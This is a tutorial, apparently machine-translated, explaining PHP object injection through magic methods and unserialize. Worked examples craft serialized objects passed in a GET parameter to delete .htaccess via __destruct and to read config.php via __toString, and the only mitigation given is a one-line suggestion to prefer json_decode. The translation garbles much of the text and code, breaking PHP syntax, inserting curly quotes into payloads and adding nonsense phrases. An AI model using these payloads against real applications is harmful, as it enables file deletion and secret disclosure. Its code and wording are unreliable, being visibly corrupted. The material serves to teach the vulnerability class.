Understanding php Object Injection

Understanding php Object Injection
0x00 background

Php Object injection is a very common vulnerability. Although this type of vulnerability is difficult to exploit, it is still very dangerous. To understand this vulnerability, you must have basic php knowledge.

0x01 vulnerability Cases

If you think this is a scum hole, please take a look at this list. Some systems that have been dug by the audited dog may be familiar with this vulnerability)

WordPress 3.6.1

Magento 1.9.0.1

Joomla 3.0.3

Ip board 3.3.5

In addition, a bunch of systems may probably have many such vulnerabilities in these other php programs, so you may want to sit down and have a cup of coffee and try to understand this article.

0x01 PHP class and Object

Classes and variables are very easy to understand. For example, the following code defines a variable and a method in a class.

<? Php class TestClass {// variable public $ variable = 'this is a string'; // a simple method of public function PrintVariable () {echo $ This-> variable ;}} // create an object $ object = new TestClass (); // call a method $ object-> PrintVariable ();?>

It creates an object and calls the PrintVariable function, which outputs the variable.

0x02 php magic Method

The php class may contain some special functions, such as _ construct, _ destruct, _ toString, _ sleep, _ wakeup and other things.

These functions are automatically called in some cases, such:

_ Construct call when an object is created (constructor) _ destruct call when an object is destroyed (destructor) _ toString when an object is used as a string

To better understand how the magic method works, let's add a magic method in our class.

<? Php class TestClass {// variable public $ variable = 'this is a string'; // a simple method of public function PrintVariable () {echo $ This-> variable. '<br/>';} // Constructor public function _ construct () {echo '_ construct <br/> ';} // Destructor public function _ destruct () {echo '_ destruct <br/>';} // Call public function _ toString () {return '_ toString <br/>';} // create an object // _ construct will be called $ object = New TestClass (); // create a method // This is a string 'will be output $ object-> PrintVariable (); // when the object is treated as a string // _ toString, echo $ object will be called; // End of PHP script // php script is about to End, _ destruct will be called?>

We put three magic methods into it, __construct, _ destruct and _ toString. You can see that __construct is called when the object is created, _ destruct is called when the php script ends, __tostring is called when the object is used as a string.

This script will output the dog sample:

__construct This is a string __toString __destruct

0x03 php Object serialization

Php allows you to save an object for reuse later. This process is called serialization. For example, you can save an object that contains user information for reuse.

To serialize an object, you need to call the "serialize" function. The function will return a string. When you need to use this object, you can use "unserialize" to recreate the object.

Let's drop in the serialization example to see what the serialization sheet looks like.

<? Php // class User {// class data public $ age = 0; public $ name = ''; // output data public function PrintData () {echo 'user '. $ this-> name. 'is '. $ this-> age. 'ears old. <br/> ';}}// create an object $ usr = new User (); // set data $ usr-> age = 20; $ usr-> name = 'john'; // output data $ usr-> PrintData (); // output serialized data echo serialize ($ usr);?>

It outputs

User John is 20 years old. O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

You can see that there are 20 and John in the serialized data, and there is nothing related to the class, only the data is digitalized.

To use this object, we use unserialize to recreate the object.

<? Php // class User {// Class data public $ age = 0; public $ name = ''; // Print data public function PrintData () {echo 'user '. $ this-> name. 'is '. $ this-> age. 'ears old. <br/> ';}}// recreate object $ usr = unserialize ('O: 4: "User": 2: {s: 3: "age"; I: 20; s: 4: "name"; s: 4: "John";} '); // call PrintData to output data $ usr-> PrintData ();?>

Will output

User John is 20 years old

0x04 serialize the magic Function

Magic functions constructor (_ construct) and destructor (_ destruct) are automatically called when an object is created or destroyed, some other magic functions will be called during serialize or unserialize.

The _ sleep magic method is called when an object is serialized. The _ wakeup magic method is called when an object is deserialized.

Note _ sleep: An array and serialized variable name must be returned.

<? Php class Test {public $ variable = 'buzz '; public $ variable2 = 'other'; public function PrintVariable () {echo $ this-> variable. '<br/>';} public function _ construct () {echo '_ construct <br/>';} public function _ destruct () {echo '_ destruct <br/>';} public function _ wakeup () {echo '_ wakeup <br/>';} public function _ sleep () {echo '_ sleep <br/>'; return array ('variable', 'variable2 '); } // Create an object and call _ construct $ obj = new Test (); // serialize an object, will call _ sleep $ serialized = serialize ($ obj); // output the Serialized string print 'serialized :'. $ serialized. <br/> '; // if the object is rebuilt, _ wakeup $ obj2 = unserialize ($ serialized) is called; // when PintVariable is called, data (BUZZ) is output) $ obj2-> PrintVariable (); // when the php script ends, _ destruct?>

This output will be:

__construct __sleep Serialized: O:4:"Test":2:{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";} __wakeup BUZZ __destruct __destruct

You can see that we have created an object, serialized it (then _ sleep is called), and then created another object with the serialized object after reconstruction, when the php script ends, the _ destruct of the two objects will be called.

0x05 php Object Injection

Now we understand how serialization works, and how should we use it? In fact, there are many possibilities to use this stuff, depending on the application process and the available classes, and magic functions.

Remember that the value of the serialized object is controllable.

You may find the source code of a web program. The _ wakeup or _ destruct and other messy functions of a class will affect the web program.

For example, we may find a class used to temporarily store logs into a file. When _ destruct is called, the log file will be deleted. Then the code is like this dog.

<? Php class LogFile {// log file name public $ filename = 'error. log'; // a code that stores logs into the public function LogData ($ text) {echo 'Log some data :'. $ text. '<br/>'; file_put_contents ($ this-> filename, $ text, FILE_APPEND);} // Destructor deletes the log file public function _ destruct () {echo '_ destruct deletes "'. $ this-> filename. '"file. <br/> '; unlink (dirname (_ FILE __). '/'. $ this-> filename) ;}}?>

An example of how to use this class

<? Php include 'logfile. php '; // create an object $ obj = new LogFile (); // set the file name and log data to be stored $ obj-> filename = 'somefile. log'; $ obj-> LogData ('test'); // php script ended, __destruct called, somefile. the log file is deleted. ?>

In other scripts, we may find another one that calls the "unserialize" function, and the variable is user-controllable. It also happens to be something like $ _ GET.

<? Php include 'logfile. php ';//... some dog-day code and LogFile classes... // simple class definition class User {// class data public $ age = 0; public $ name = ''; // output data public function PrintData () {echo 'user '. $ this-> name. 'is '. $ this-> age. 'ears old. <br/> ';}}// recreate user input data $ usr = unserialize ($ _ GET ['usr _ serialized']);?>

You see, this code calls the "LogClass" class, and there is a "unserialize" value that we can inject.

So construct something like this:

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

What happened? Because the input is controllable, we can construct any serialized object, for example:

<?php $obj = new LogFile();$obj->filename = '.htaccess'; echo serialize($obj) . '<br />'; ?>

This will output

O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} __destruct deletes ".htaccess" file.

Now we will send the constructed serialized object to the script just now:

script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}

This will output

__destruct deletes ".htaccess" file.

Now. htaccess has been killed because _ destruct will be called at the end of the script. However, we can control the variables of the "LogFile" class.

This is the origin of the vulnerability name: the serialization object is injected into the location where variables are controllable and unserialize operations are performed to implement code execution or other malicious behaviors.

Although this is not a good example, I believe you can understand this concept. unserialize automatically calls _ wakeup and _ destruct. Then attackers can control class variables and attack web programs.

0x06 common injection points

Aside from _ wakeup and _ destruct, there are some common injection points that allow you to exploit this type of vulnerability. Everything depends on the program logic.

For example, a user class defines a _ toString so that the application can output the class as a string (echo $ obj ), other classes may also define a class that allows _ toString to read a file.

<? Php //... Some include... class FileClass {// file name public $ filename = 'error. log'; // when the object is used as a string, it will read the public function _ toString () {return file_get_contents ($ this-> filename );}} // Main User class User {// class data public $ age = 0; public $ name = ''; // allow the object to output the above data public function _ toString () {return 'user' as a string '. $ this-> name. 'is '. $ this-> age. 'ears old. <br/> ';}}// user controllable $ obj = uns Erialize ($ _ GET ['usr _ serialized ']); // output _ toString echo $ obj;?>

So, we construct the url

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

Think about it. What if we call FileClass with serialization?

We create exploitation code

<?php $fileobj = new FileClass();$fileobj->filename = 'config.php'; echo serialize($fileobj); ?>

Then inject the url with the generated exp

script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}

The page will output the source code of config. php.

<?php $private_data = 'MAGIC'; ?>

Ps: I hope this will make you understand.

0x07 other exploitation methods

Other magic functions may exist in the sea. For example, _ call is called when an object calls a function that does not exist, __get and _ set will be called when the object tries to access some nonexistent classes, variables, and so on.

However, it should be noted that the use scenario is not limited to the magic function. There are also some ways to use this vulnerability in half of the functions. For example, A module may define a function called get for some sensitive operations, such as database access, which may cause SQL injection, depending on the operation of the function itself.

0x08 how to exploit or avoid this vulnerability

Do not use "unserialize" wherever you can, consider "json_decode"

0x09 conclusion

Although it is difficult to find and exploit, it is really serious and can lead to various vulnerabilities.